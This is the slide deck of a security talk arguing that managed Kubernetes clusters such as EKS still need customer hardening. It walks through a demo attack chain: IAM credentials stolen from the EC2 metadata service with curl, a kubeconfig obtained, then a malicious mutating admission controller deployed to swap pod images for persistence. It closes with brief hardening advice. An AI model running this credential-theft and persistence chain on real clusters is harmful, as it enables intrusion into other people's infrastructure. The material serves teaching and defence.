# Security Myths about managed Kubernetes clusters

---

## About me

[https://rewanthtammana.com/](https://rewanthtammana.com/)

Rewanth Tammana is a security ninja, open-source contributor, freelancer & Senior Security Architect at Emirates NBD. Passionate about DevSecOps, Application, and Container Security. Added 17,000+ lines of code to Nmap. Holds industry certifications like CKS, CKA, etc.

---

## About me

[https://twitter.com/rewanthtammana](https://twitter.com/rewanthtammana)

Speaker & trainer at international security conferences worldwide including Black Hat, Defcon, Hack In The Box (Dubai and Amsterdam), CRESTCon UK, PHDays, Nullcon, Bsides, CISO Platform, null chapters and multiple others.

---

## About me

[https://linkedin.com/in/rewanthtammana](https://linkedin.com/in/rewanthtammana)

One of the MVP researchers on Bugcrowd (2018) and identified vulnerabilities in several organizations. Published an IEEE research paper on an offensive attack in Machine Learning and Security. Also, part of the renowned Google Summer of Code program.

---

### What to expect

There are numerous resources on the internet to help you harden self-hosted, managed, or even hybrid Kubernetes environments. Through this demonstration, I want to show you WHY you must be extra careful in securing your clusters (including managed services)!

---

## Kubernetes

Kubernetes is an open-source container orchestration system for automating software deployment, scaling, and management - https://en.wikipedia.org/wiki/Kubernetes

---

## Real world attack scenarios

---

### Enumeration

Run an nmap scan to identify open ports, use Shodan to list internet-connected systems, etc.

---

### Privilege escalation

This can happen for various reasons: misconfiguration, insecure coding, etc.

---

### Access host machine

There are many ways to access host machines.

---

### Demo

<!-- af9bda68590174092982afc52a4cca10-1604281243.ap-south-1.elb.amazonaws.com -->

3.108.231.98

Repeat the above steps here!

- Enumeration

- Privilege Escalation

- Access host machine

---

### Enumerating the host machine

```bash

ls -la /sys/hypervisor/uuid

cat /sys/hypervisor/uuid

```

If the output starts with `ec2`, the machine is most likely an EC2 instance.

---

Alternatively, we can use `dmidecode` to check whether the machine is a cloud instance.

```bash

dmidecode -s bios-version

```
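The two checks above can be folded into one small helper. This is only a sketch: `looks_like_ec2` is a hypothetical function name, and it assumes the identifying strings either begin with `ec2` or mention Amazon. The exact values vary by instance type, so treat a match as a hint, not proof.

```bash
# Sketch: classify identification strings read from the host.
# looks_like_ec2 is a hypothetical helper, not part of any AWS tooling.
looks_like_ec2() {
  # $1: a string such as the contents of /sys/hypervisor/uuid
  #     or the output of `dmidecode -s bios-version`
  local value
  value=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  case "$value" in
    ec2*|*amazon*) return 0 ;;   # "ec2" prefix or an Amazon BIOS string
    *)             return 1 ;;
  esac
}

# Usage on the target host (either source may be missing):
#   looks_like_ec2 "$(cat /sys/hypervisor/uuid 2>/dev/null)" && echo "probably EC2"
#   looks_like_ec2 "$(dmidecode -s bios-version 2>/dev/null)" && echo "probably EC2"
```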

---

### Identifying the running processes

```bash

ps aux

```

Lots of containerd related processes. Why? How about we look for docker related things?

---

```bash

docker images

```

The result shows images pulled from the Amazon ECR registry. Let's see if we can authenticate to Amazon ECR.

---

```bash

cat ~/.docker/config.json

```

No saved authentication details. That ain't good.

---

```bash

docker ps

```

The result shows pods, coredns, etc. This means we are looking at a Kubernetes cluster.

---

### Enumerating for kubernetes cluster

```bash

kubectl get pods

```

kubectl not found. Download it.

```bash

cd /tmp

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

chmod +x kubectl

/tmp/kubectl get po

```

We get a connection error to `localhost:8080`.

---

We need to authenticate to the Kubernetes API server. Let's check if we have the authentication information on the server.

```bash

cat ~/.kube/config

```

No authentication information. We need to extract the login information!

---

### Establishing connection to kubernetes cluster

We know we are on an AWS instance. By default, EC2 instances can communicate with the instance metadata service.

```bash

curl http://169.254.169.254/latest/meta-data/iam/info

```

---

Ask the instance metadata service for the security credentials

```bash

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

output=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/)

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/$output

data=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/$output)

```
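Some instances are configured to require IMDSv2, in which case the plain `curl` calls above come back unauthorized. A minimal sketch of the token-based variant follows. The helper names `imds_url` and `imds_get` and the 300-second TTL are illustrative assumptions, not something from the demo.

```bash
# Sketch: IMDSv2-style requests. imds_url and imds_get are hypothetical helpers.
IMDS_HOST="http://169.254.169.254"

imds_url() {
  # Build the metadata URL for a path such as "iam/info".
  printf '%s/latest/meta-data/%s\n' "$IMDS_HOST" "$1"
}

imds_get() {
  # Request a short-lived session token, then send it with the metadata request.
  local token
  token=$(curl -s -X PUT "$IMDS_HOST/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 300") || return 1
  curl -s -H "X-aws-ec2-metadata-token: $token" "$(imds_url "$1")"
}

# Usage on the instance:
#   role=$(imds_get iam/security-credentials/)
#   data=$(imds_get "iam/security-credentials/$role")
```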

---

Export the above security credentials to environment variables & access AWS services

```bash

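# jq -r strips the JSON quotes; the AWS CLI reads AWS_ACCESS_KEY_ID, not AWS_ACCESS_KEY
export AWS_ACCESS_KEY_ID=$(echo "$data" | jq -r '.AccessKeyId')

export AWS_SECRET_ACCESS_KEY=$(echo "$data" | jq -r '.SecretAccessKey')

export AWS_SESSION_TOKEN=$(echo "$data" | jq -r '.Token')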

```

---

Since we observed that the server might be running Kubernetes, let's see if it's an EKS cluster or something else.

```bash

aws eks list-clusters

```

---

The region flag is mandatory. How can we identify which region it is? Any guesses?

---

There are multiple ways to identify a region. AWS has only a few dozen regions, so we could brute-force all of them. But that would create a lot of noise, & we don't know anything about the security controls of that system. It's best to stay stealthy.

---

Let's identify the public IP address of the machine & then use a website to geolocate the server.

---

```bash

curl ifconfig.co

```

Visit [https://www.iplocation.net/ip-lookup](https://www.iplocation.net/ip-lookup) to geolocate the server.
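Another low-noise option, assuming the instance metadata service is reachable as in the earlier steps, is to read the availability zone and drop its trailing letter. `region_from_az` is a hypothetical helper, and the sketch only handles standard zone names such as `ap-south-1a`, not Local Zone names.

```bash
# Sketch: derive the region from an availability zone name.
# region_from_az is a hypothetical helper; it assumes a standard AZ name.
region_from_az() {
  # Drop the single trailing zone letter: "ap-south-1a" -> "ap-south-1".
  printf '%s\n' "${1%[a-z]}"
}

# Usage on the instance:
#   az=$(curl -s http://169.254.169.254/latest/meta-data/placement/availability-zone)
#   REGION=$(region_from_az "$az")
```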

---

AWS region information: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html

```bash

REGION=<REGION>

aws eks list-clusters --region $REGION

```

---

Let's export the `kubeconfig` file that is used to authenticate to the cluster

```bash

# jq -r prints the cluster name without the surrounding JSON quotes
clustername=$(aws eks list-clusters --region $REGION | jq -r '.clusters[0]')

aws eks update-kubeconfig --name $clustername --region $REGION

/tmp/kubectl get po

```

---

`The connection to the server localhost:8080 was refused - did you specify the right host or port?`

Still same error. Any guesses?

---

```bash

cat ~/.kube/config

```

---

```bash

/tmp/kubectl get po -v 1

```

---

```bash

/tmp/kubectl get po --kubeconfig ~/.kube/config

```

---

```bash

/tmp/kubectl version --kubeconfig ~/.kube/config

```

---

```bash

/tmp/kubectl get po --kubeconfig ~/.kube/config

error: exec plugin: invalid apiVersion "client.authentication.k8s.io/v1alpha1"

```

In Kubernetes, API versions are frequently upgraded and old ones removed, so it's important for us to understand the implications.

The error says invalid API version. Any ideas, why? How to fix it?

---

Kubernetes 101

The `kubectl` client version must be within one minor version (plus/minus one) of the server version.
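The plus/minus one rule can be checked mechanically once both versions are known. A rough sketch follows. `minor_of` and `within_skew` are hypothetical helpers, and the version strings in the usage note are examples only.

```bash
# Sketch: check the kubectl/server minor-version skew.
# minor_of and within_skew are hypothetical helpers.
minor_of() {
  # Extract the minor number from a version such as "v1.23.7-eks-4721010".
  local v=${1#v}                  # strip a leading "v"
  v=${v#*.}                       # drop the major component
  printf '%s\n' "${v%%[!0-9]*}"   # keep the digits before the next non-digit
}

within_skew() {
  # Succeeds when client ($1) and server ($2) minors differ by at most one.
  local c s diff
  c=$(minor_of "$1")
  s=$(minor_of "$2")
  diff=$(( c - s ))
  [ "${diff#-}" -le 1 ]           # ${diff#-} is the absolute value
}

# Usage:
#   within_skew v1.24.0 v1.23.7 && echo "client and server are compatible"
```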

---

Kubernetes client version

```bash

/tmp/kubectl version

```

---

How to identify the server version?

We don't have login information. We cannot connect to the server to get any information.

Any guesses? How to get the Kubernetes server version?

---

From `docker images` you can see the `kube-proxy` version.

```bash

docker images

```

Let's download the closest `kubectl` version.

```bash

cd /tmp

curl -LO "https://dl.k8s.io/release/v1.23.0/bin/linux/amd64/kubectl"

chmod +x kubectl

/tmp/kubectl get po --kubeconfig ~/.kube/config

```
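Reading the version off the image list by eye works, but it can also be scripted. The sketch below assumes the `kube-proxy` image tag starts with the upstream version (for example `v1.23.7-...`) and that a matching release exists on `dl.k8s.io`. `kube_proxy_version` and `kubectl_url` are hypothetical helpers.

```bash
# Sketch: pick the kubectl version from the kube-proxy image tag.
# kube_proxy_version and kubectl_url are hypothetical helpers.
kube_proxy_version() {
  # Read "repository:tag" lines on stdin and print the first kube-proxy
  # version in vMAJOR.MINOR.PATCH form.
  grep 'kube-proxy' | grep -oE 'v[0-9]+\.[0-9]+\.[0-9]+' | head -n 1
}

kubectl_url() {
  # Build the dl.k8s.io download URL for a given version.
  printf 'https://dl.k8s.io/release/%s/bin/linux/amd64/kubectl\n' "$1"
}

# Usage on the node:
#   ver=$(docker images --format '{{.Repository}}:{{.Tag}}' | kube_proxy_version)
#   curl -LO "$(kubectl_url "$ver")"
```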

---

Now we can execute whatever we want. But like I said before, attackers prefer to stay stealthy. The worst-case scenario is an attacker staying in the system forever.

One such attack will be demonstrated now!

---



### Malicious admission controllers

I created a project a while back on how attackers can abuse mutating webhooks.

[https://blog.rewanthtammana.com/creating-malicious-admission-controllers](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)

Source: kubernetes.io

---

### Persistent access demo

Regular deployment

```bash

/tmp/kubectl run nginx --image nginx

/tmp/kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'

```

---

```bash

/tmp/kubectl --kubeconfig ~/.kube/config run nginx --image nginx

Error from server (Forbidden): pods "nginx" is forbidden: pod does not have "kubernetes.io/config.mirror" annotation, node "ip-192-168-8-77.ap-south-1.compute.internal" can only create mirror pods

```

BAM.... error. I cannot create pods. Any guesses? How to fix it?

---

We are trying to create new resources with the identity of an AWS worker node, & the API server rejects it: a node can only create mirror pods.

How do we create pods? What do we need?

---

Copy the Kubernetes authentication file from the EC2 instance to the local machine!

```bash

/tmp/kubectl get po --kubeconfig /tmp/kubeconfig

```

---

Regular deployment

```bash

/tmp/kubectl run nginx --image nginx

/tmp/kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'

```

---

Deploying malicious admission controller

```bash

git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo.git

cd malicious-admission-controller-webhook-demo

./deploy.sh

```

---

Regular deployment again but the result 😱😱😱

```bash

kubectl run nginx2 --image nginx

kubectl get po nginx2 -o=jsonpath='{.spec.containers[].image}{"\n"}'

```

You asked for the `nginx` image, but `rewanthtammana/malicious-image` was deployed instead!

---

Irrespective of what you deploy, the malicious image gets deployed. Alternatively, the attacker can mutate every request to add a sidecar, send secrets to their C&C server via init containers, & so on.
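One way to spot this kind of persistence is to compare the registered mutating webhooks against a list you expect. A minimal sketch follows. `unexpected_webhooks` is a hypothetical helper, and the allowlisted name in the usage note is only an example. Build the real list from your own cluster.

```bash
# Sketch: flag mutating webhook configurations that are not on an allowlist.
# unexpected_webhooks is a hypothetical helper.
unexpected_webhooks() {
  # stdin: one webhook configuration name per line
  # args:  the names you expect to see in this cluster (the allowlist)
  local name allowed found
  while IFS= read -r name; do
    name=${name##*/}              # strip the "kind/" prefix of `-o name` output
    [ -n "$name" ] || continue
    found=0
    for allowed in "$@"; do
      if [ "$name" = "$allowed" ]; then found=1; fi
    done
    [ "$found" -eq 1 ] || printf '%s\n' "$name"
  done
}

# Usage (the allowlisted name is an example only):
#   kubectl get mutatingwebhookconfigurations -o name \
#     | unexpected_webhooks pod-identity-webhook
```

Anything the function prints deserves a closer look with `kubectl get mutatingwebhookconfiguration <name> -o yaml`.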

---

### Cleanup the malicious admission controller

```bash

./cleanup.sh

```

---

## Managed vs Self Hosted Kubernetes

Managed Kubernetes offerings

* EKS (AWS)

* GKE (GCP)

* AKS (Azure)

* and many more

It's often presumed that with managed clusters, the cloud provider will handle everything for us. As you have seen in the demo, that's not the case!

---

Misconfigurations in cloud === Vulnerabilities in application

Both must be secured!

---



Managed services are responsible ONLY for control plane components - apiserver, scheduler, etcd, controllers, etc.

Reference: [control-plane-components](https://kubernetes.io/docs/concepts/overview/components/#control-plane-components)

The cloud provider handles availability, scalability, etc. In some cases, you lose control over customizing managed components.

---

etcd is maintained by EKS, but it doesn't come with a secure configuration out of the box.

For example, data in etcd should be encrypted, but EKS doesn't do it for you unless you enable it.
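A quick way to see whether encryption has been enabled is to look at the cluster's `encryptionConfig` field. The sketch below assumes the `--query` output is empty, `null`, `None`, or `[]` when nothing is configured. `secrets_encryption_enabled` is a hypothetical helper.

```bash
# Sketch: interpret the encryptionConfig field of an EKS cluster.
# secrets_encryption_enabled is a hypothetical helper.
secrets_encryption_enabled() {
  # $1: output of the describe-cluster query shown in the usage note
  case "$(printf '%s' "$1" | tr -d '[:space:]')" in
    ""|null|None|"[]") return 1 ;;   # nothing configured
    *)                 return 0 ;;   # some encryption provider is listed
  esac
}

# Usage:
#   cfg=$(aws eks describe-cluster --name "$clustername" --region "$REGION" \
#           --query 'cluster.encryptionConfig' --output json)
#   secrets_encryption_enabled "$cfg" || echo "no encryptionConfig on this cluster"
```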

---

### Shared Responsibility

Source: AWS

For EKS, Amazon takes care of the Kubernetes core components ONLY. Everything else is the responsibility of the customer.

---

### Securing Kubernetes

In self-managed Kubernetes, the team is responsible for everything. With managed services, we rely on the cloud provider only for managing, upgrading, and patching the managed components.

---

I hope I have made the security myths about managed Kubernetes clusters clear, & WHY securing clusters is MANDATORY (even for managed services).

---

How to secure EKS/any managed services?

Maybe it's for another wonderful evening!

---

To list a few hardening things:

1. Network Policy - Can help block connections from pods to the AWS IMDS. Calico also offers node-level policies!

2. OPA Gatekeeper - Acts as a watcher for all deployments

3. Scanning images, hardening configurations, pod security policies, runtime security, security groups, IAM, alerting based on Kubernetes events, & a lot more.

All of this configuration is PURELY the user's responsibility.
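As an illustration of the first item, the sketch below prints a NetworkPolicy that allows all pod egress except the metadata address. The policy name `deny-imds-egress` and the helper `deny_imds_policy` are hypothetical. It only has an effect when the cluster's CNI enforces NetworkPolicy (Calico, for example), and it covers pods in the selected namespace, not processes running directly on the node.

```bash
# Sketch: emit a NetworkPolicy that blocks pod egress to the IMDS address.
# deny_imds_policy and the policy name are hypothetical.
deny_imds_policy() {
  # $1: target namespace (defaults to "default")
  local ns=${1:-default}
  cat <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-imds-egress
  namespace: ${ns}
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32
EOF
}

# Usage:
#   deny_imds_policy my-namespace | kubectl apply -f -
```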

---

Q & A

------------------------

Write to me on:

Google: [Rewanth Tammana](https://www.google.com/search?q=rewanth+tammana&oq=rewanth+tammana)

Website: [rewanthtammana.com](https://rewanthtammana.com)

Twitter: [@rewanthtammana](https://twitter.com/rewanthtammana)

LinkedIn: [/in/rewanthtammana](https://linkedin.com/in/rewanthtammana)
